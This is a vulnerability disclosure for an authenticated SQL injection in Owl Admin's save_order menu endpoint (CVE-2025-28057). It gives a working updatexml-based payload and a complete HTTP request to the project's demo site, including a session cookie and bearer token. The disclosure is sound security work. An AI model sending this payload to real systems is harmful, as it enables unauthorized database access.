Owl Admin system SQL injection vulnerability.

Owl Admin system SQL injection

  • The Owl Admin system has a SQL injection vulnerability in the /admin-api/system/admin_menus/save_order interface.

POC:

1
ids=7,"(2)then(updatexml(1,concat(0x7e,(SELECT+(user())),0x7e),1))else`order`end#"
  • After logging into the Owl Admin system, it is possible to construct special parameters that can cause SQL injection.

Affected versions

  • 3.2.2~4.10.2

Vulnerability location:

QQ20250214-190934

QQ20250214-190802

QQ20250214-190727

Vulnerability Exploitation Demonstration:

QQ20250214-185524

QQ20250214-185920

Network packet:

  • Request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /admin-api/system/admin_menus/save_order HTTP/2
Host: demo.owladmin.com
Cookie: owl_amdin_demo_session=eyJpdiI6Ik9OeTF6MWtYQ0pxN28vMlRiZ2NDaXc9PSIsInZhbHVlIjoiYXdFNHRtanRudEF0YUNMOFNINVptRElCdW1oM3JqbUxZeDAva0cyTHRRMitHOTZsQkt0RTVoaDJXM3c0d1BaUGF1ODRpcWtDYnhFcHdYQ0ZkSVdIVWpOeWllNEtiRVRWRlVMbXRaTDF5TWZjNTFRN1hzT1ZiL3dnOXV4Z3dvaHoiLCJtYWMiOiJhMmZhOGM2ZDI2NzgwYWY4NzJjOWYzYTlhOWZjZTUwODM1MzIwMjliOWQ1NzBhYmM4NmIyNzAxMGQ3YzJjOTkwIiwidGFnIjoiIn0%3D
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/plain, */*
Authorization: Bearer 2899|LdiGv9T3ycjTshZ01FMqtDeTLj496rHtHVmx5gYm
Locale: zh_CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.owladmin.com/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

ids=7,"(2)then(updatexml(1,concat(0x7e,(SELECT+(user())),0x7e),1))else`order`end#"

CVE

  • CVE-2025-28057